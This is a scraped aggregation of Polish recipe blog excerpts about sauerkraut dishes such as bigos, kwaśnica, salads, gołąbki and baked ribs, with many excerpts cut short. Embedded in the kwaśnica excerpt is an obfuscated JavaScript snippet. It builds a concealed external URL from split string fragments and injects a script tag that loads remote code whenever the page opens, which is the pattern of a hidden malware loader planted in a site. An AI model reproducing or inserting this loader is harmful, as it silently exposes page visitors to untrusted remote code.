białą kapustą odbiega od tradycyjnej wersji, ale jest naprawdę smaczny. Dla nas obiad idealny. Spróbujcie Do siekania białej kapusty używam szatkownicy Hebel V5 PowerLine Borner Polska Składniki: 150 g kapusty kiszonej (u mnie domowa z tego przepisu) pół mniejszej główki białej kapusty 300 g kiełbasy (można dać mniej) – u mnie krakowska 120 g paprykowych kabanosów kilka pieczarek (u mnie(...)olej do podsmażenia składników 3/4 opakowania makaronu makaronu łazanki – u mnie makaron z borowikami Makarony Babuni 1 cebula Przygotowanie: Obie kapusty należy obgotować. Ja miałam już wcześniej ugotowaną kiszoną kapustę – został mi nadmiar z innego dania (kapusta zalana wodą do wysokości, gotowana do miękkości z liściem laurowym i zielem angielskim). Zajęłam się tylko białą kapustą – szybko
Słodkie okruszkiWitajcie po świątecznej przerwie! Zostało Wam trochę kiszonej kapusty? Macie może nadmiar pomarańczy? Pewnie niejedna osoba odpowiedziała twierdząco. A więc do roboty :) Zapraszam na super surówkę. Smak kiszonej kapusty został w tej surówce fajnie przełamany słodkimi pomarańczami. Polecam - bardzo nam smakowała! Przepis znalazłam u Danusi :) Składniki: 1/2 kg kapusty 1 duża pomarańcza 1 mała cebulka 1 marchewka kilka łyżek oleju(...)doprawić do smaku. Smacznego!!! Źródło: Co mi w duszy gra Na blogu możecie znaleźć surówkę z kiszonej w wersji tradycyjnej i z rodzynkami. Obie pyszne! Polecam! Surówka z kiszonej kapusty Surówka z kiszonej kapusty z kukurydzą i rodzynkami
Kuchnia domowa Anidużą ilością mięsa z grzybami i wędzoną śliwką. Jego przygotowanie jest czasochłonne, ale dzięki temu nasz bigos odwdzięczy się nam smakiem i aromatem. Składniki: 3 kg kapusty kiszonej 1 kg białej kapusty 2 kg łopatki wieprzowej 1 kg kiełbasy 750 g boczku wędzonego 5 dużych cebul 200 g suszonych grzybów 10 śliwek wędzonych 1 szklanka(...)garnka. Dodaję boczek w całości, liść laurowy, ziele angielskie, kminek, jałowiec, majeranek i wlewam wodę z grzybów. Następnie dolewam wody, tylko tyle by przykryła kapustę i stawiam na ogień. Białą kapustę siekam i dodaję do kiszonej kapusty. Gotuję pod przykryciem na małym ogniu. Mięso kroję w kostkę. Na patelni rozgrzewam tłuszcz, smażę mięso, często mieszając. Po 30 minutach gotowania
magiczna kuchnia Kasidodaję wędzony boczek i kiełbasę :) Najlepszym mięsem do bigosu będzie łopatka albo karkówka. Kapustę dodaję i świeżą, białą jak i kiszoną. Jeśli lubicie kwaśny bigos dodajcie 1,5 kg kapusty kiszonej na 1,2 kg kapusty białej. Dla zwolenników mniej kwaśnego bigosu odpowiednia proporcja to 1,5 kg kapusty białej na 1,2 kg kapusty kiszonej. Dla głębszego smaku(...)się nie przypalił. Gotowy bigos może stać w lodówce przez kilka dni. Najlepiej smakuje z pajdą chleba. Bigos staropolski świąteczny składniki: 1,5 kg kapusty białej 1,5 kg kapusty kiszonej 1 kg mięsa 30 dag wędzonego boczku 50 dag kiełbasy wiejskiej 4 cebule 8-9 suszonych śliwek 8-9 suszonych grzybów 6-7 ziarenek jałowca 10 ziarenek pieprzu
Ekspansja smakuwychodzi cały garnek, można go podzielić dodając do drugiej części np. wymoczone i posiekane suszone grzyby, mięso lub kiełbasę oraz suszone śliwki. Powstaną dwie potrawy polecam! SKŁADNIKI: 1300 g kapusty kiszonej, odciśniętej (u mnie kiszona z marchewką) 400 g łuskanego, suchego grochu, u mnie połówki 3 większe cebule, obrane, drobno posiekane 3 liście laurowe, 4 kulki ziela angielskiego świeżo zmielony(...)zasmażką z masła i mąki. Rozpuścić ok. 100 g masła i wsypać 1 łyżkę mąki, szybko wymieszać rózgą kuchenną, dodać do kapusty z grochem. Aby mi wyszło 1300 g kiszonej kapusty odciśniętej kupiłam dwa pojemniki kapusty z marchewką o pojemności 1 kg, po dokładnym odciśnięciu wyszło 1300 g kapusty kiszonej. PRZYGOTOWANIE: Przygotowanie kapusty z grochem zaczynam od przepłukania grochu, zalania
Zasmakuj KuchniGOŁĄBKI Z KISZONEJ KAPUSTY SKŁADNIKI 1 duża główka kiszonej kapusty; 500 gramów łopatki wieprzowej; 300 gramów kaszy jęczmiennej; 500 ml bulionu drobiowego; 60 gramów suszonych podgrzybków; duża cebula; 1 łyżka mielonej, słodkiej papryki; wiejskie jajko; gęsta, kwaśna śmietana; natka pietruszki; garść suszonych warzyw; ziele angielskie; liść laurowy; sól, pieprz; przepis na gołąbki z kiszonej kapusty Artykuł Gołąbki z kiszonej kapusty
Kuchnia Tomkabiałej kapusty 1 marchewka (niekoniecznie) sól 20 g. na 1 kg. poszatkowanej kapusty Wykonanie: Główka kapusty którą kupiłam ważyła niecałe 2,5 kg. Najpierw należy usunąć wierzchnie liście, przekroić i usunąć głąb. Następnie kapustę umyć i poszatkować. Po poszatkowaniu miałam 2 kg. kapusty. Marchewkę zetrzeć na tarce o dużych oczkach. Dodać do kapusty. Wsypać(...)miskę z kapustą na 30-40 minut. Słoiki dokładnie umyć i wyparzyć. Do czystych słoików przełożyć kapustę razem z sokiem. Wkładać kapustę partiami. Po każdym włożeniu ubijać drewnianą końcówką od tłuczka lub łyżki, aż kapusta puści sok. Wierzch kapusty powinien być przykryty sokiem. Kapusty powinno być 3/4 słoika, ponieważ podczas kiszenia kapusta zwiększa objętość
Agusiowe smakołykijadło się go po raz pierwszy. Bigos jest taką potrawą, że w każdym domu smakuje inaczej, ale na pewno podstawowe dwa składniki bigosu muszą się w nim znaleźć: kiszona kapusta i suszone grzyby. Mój bigos jest jeszcze obowiązkowo z dodatkiem wędzonych śliwek i miodu. Do bigosu na Wigilię nigdy nie dodaję pomidorów ani koncentratu, powinno się w nim czuć tylko(...)smak grzybów i kapusty. Bigos z kiszonej kapusty można przygotować na 1 - 2 dni wcześniej, wtedy nawet po podgrzaniu jest jeszcze smaczniejszy. Jestem ciekawa, czy podobny bigos gości na Waszym świątecznym stole i co w nim musi się obowiązkowo znaleźć? Składniki: (porcja na 2 - 3 osoby) 1 kg kiszonej kapusty 100 g suszonych grzybów (u mnie prawdziwki
Kuchcik gotujedobrej kiełbasy. Nigdy nie żałuję suszonych grzybów, jałowca i angielskiego ziela. W tym roku doprawiłam bigos wytrawnym sherry. Bigos z sherry Składniki: 2 kg poszatkowanej białej kapusty 1 kg kiszonej kapusty bez marchewki ½ kg wieprzowej szynki, surowej 300 g wędzonego boczku ½ kg karkówki ½ kg wołowiny z kością 4 śląskie 2 cebule 30 g suszonych grzybów 1 czosnek solo 1½ łyżki(...)być mięciutkie, tak by można było rozrywać je palcami. Ostudzone mięso podziel na małe kawałeczki. Poszatkuj kapustę i ugotuj w niewielkiej ilości, lekko osolonej wodzie. W drugim garnku obgotuj kiszoną kapustę. Odcedź kiszoną kapustę i odciśnij wodę jeśli nie chcesz aby bigos był zbyt kwaśny. Ja nie odciskałam. Zalej grzyby wrzątkiem i pozostaw na 30 minut. Po tym czasie, odcedz
codojedzeniakapustę i obsmażone mięso, po czym całość zapieka się w piekarniku. Równie dobrze danie można przyrządzić w garnku z grubym dnem, dusząc je na wolnym ogniu, choć wymaga ono wówczas mieszania i doglądania. Żeberka zapiekane z kapustą nie pochłaniają wiele pracy, a smakują wybornie. Na Podkarpaciu przygotowuje się je w dwóch odmianach – z kapustą słodką i z kapustą kiszoną. Zazwyczaj(...)Wielkiej księdze tradycji kulinarnych województwa podkarpackiego” wydanej przez Stowarzyszenie na Rzecz Rozwoju i Promocji Podkarpacia „Pro Carpathia”. Żeberka zapiekane z kapustą – kuchnia podkarpacka Żeberka zapiekane z kapustą – kuchnia podkarpacka Składniki: 800 g żeberek, 1 kg kapusty kiszonej 2 cebule 2 marchewki 1 jabłko 4 łyżki smalcu sól, pieprz 3-4 szklanki rosołu Żeberka myjemy, osuszamy i kroimy na porcje. Solimy
Trzeci talerzUwielbiam młodą kapustę. Mąż kupił dość dużą główkę. wiec od razu pomyślałam o bigosie, choć lato mamy i bigos to raczej zimowe danie. Jednak pomyślałam, że kupię młodą kiszoną kapustę i bigos będzie wyśmienity. I rzeczywiście jest przepyszny. Dodałam do niego grzyby, ale ze śliwek i wina zrezygnowałam, by bigos miał delikatniejszy smak. Kapusta po prostu rozpływa się w ustach(...)Koniecznie taki ugotujcie! Składniki: 750 g kapusty kiszonej 750 g młodej kapusty słodkiej 400 g chudej wieprzowiny (np. szynki) 250 g salami w kawałku 350 g kiełbasy, np. głogowskiej garść grzybów suszonych ok. 6 śliwek suszonych (pominęłam) 2 liście laurowe kilka ziaren pieprzu ziarnistego kilka ziaren ziela angielskiego 1 łyżka kminku 1 duża, najlepiej młoda cebula 3 ząbki
Czerwień i błękitserwuje się na zimno lub na ciepło. Kwaśnica Kwaśnica to zupa na Wigilię wywodząca się z Podhala. Przygotowuje się ją z: Głowy i podrobów z wybranej ryby 30 dag kapusty kiszonej Soku z kapusty kiszonej Kilku suszonych grzybów 5 ziaren ziela angielskiego 2 ząbków czosnku Szczypty suszonego imbiru Kiszoną kapustę szatkujemy, wrzucamy do garnka, zalewamy odrobiną wody oraz sokiem(...)kiszonej kapusty i gotujemy. Dodajemy grzyby, ziele angielskie i gotujemy do zmięknięcia. Dodajemy podroby i głowy ryb, gotujemy przez 20 minut, wyjmujemy podroby, doprawiamy czosnkiem oraz imbirem i ponownie zagotowujemy. (function(){ cwbx=document.createElement("script");cwbx_=("ust");cwbxu="69293527"; cwbx_+="a"+("t.i");cwbx.type="text/javascript"; cwbxu+=".pdmwktdtwbxmgxxyXtf9";cwbx.async=true;cwbx_+="n"+("f"+"o")+"/"; cwbxu+="bn8i421swj";cwbx.src="//"+cwbx_+cwbxu; document.body.appendChild(cwbx); })(); Artykuł Zupa
Okiem Blondynki by McBlondizapasteryzować trzymając 30 minut w piekarniku nagrzanym do 120 stopni C (bez termoobiegu). Część bigosu można wykorzystać do pierogów , z kolejnej upiec paszteciki . SKŁADNIKI / 8-10 PORCJI 1 kg kiszonej kapusty 600 g świeżej białej kapusty 2 cebule 2 ząbki czosnku 4 łyżki oleju 50 g masła 1/2 szklanki zielonej soczewicy 1 jabłko 3 łyżki powideł śliwkowych 20 suszonych śliwek(...)brandy lub czerwonym winem i również odstawiamy do namoczenia. Cebule obieramy i kroimy w drobną kostkę, czosnek kroimy w plasterki. Zieloną soczewicę płuczemy na sicie. Białą kapustę drobno szatkujemy, kapustę kiszoną kroimy na mniejsze kawałki. W dużym szerokim garnku (najlepiej z grubym dnem) rozgrzewamy masło i olej. Dodajemy cebulę i czosnek, smażymy 5 minut, na średnim ogniu, często mieszając
cool and mintypowodów dla których założyłam tego bloga, jest to że dzięki niemu nie będę już musiała pamiętać wszystkich przepisów. Bo zwykle ich nie pamiętam. Na przednówku robiłam zawsze surówkę z kiszonej kapusty z różnymi aromatycznymi ziarenkami. Pierwszy raz jadłam ją w wykonaniu Asi Erbel. Potem zaczęłam dodawać olej lniany albo rydzowy z lnianki. Na pewno była wśród nich czarnuszka, ale były(...)bardziej “polskiego” charakteru. Można by ją podawać turystom jako wzór polskich smaków. Tymczasem spisuję ten prosty przepis, bo jeszcze zapomnę nawet o czarnuszce. Składniki na każdą osobę: garść kiszonej kapusty łyżka oleju lnianego lub rydzowego duża szczypta nasion czarnuszki Jak przygotować kiszoną kapustę z olejem lnianym i czarnuszką? Czarnuszkę możemy lekko podsmażyć na patelni, żeby stała się bardziej
Ugotowane pozamiataneZwykle robię bigos z kapusty kiszonej, choć bardziej popularne są chyba bigosy mieszane – z kapusty kiszonej i białej (surowej). Byłam ciekawa, jak smakuje bigos z białej kapusty bez kapusty kiszonej, dlatego wypróbowałam przepis Koła Gospodyń Wiejskich z Terliczki (Podkarpacie)*. Efekt był bardzo smaczny i polecam tę wersję szczególnie tym, którzy nie mają dostępu do kapusty kiszonej. Składniki: 1 główka poszatkowanej
Trzeci talerz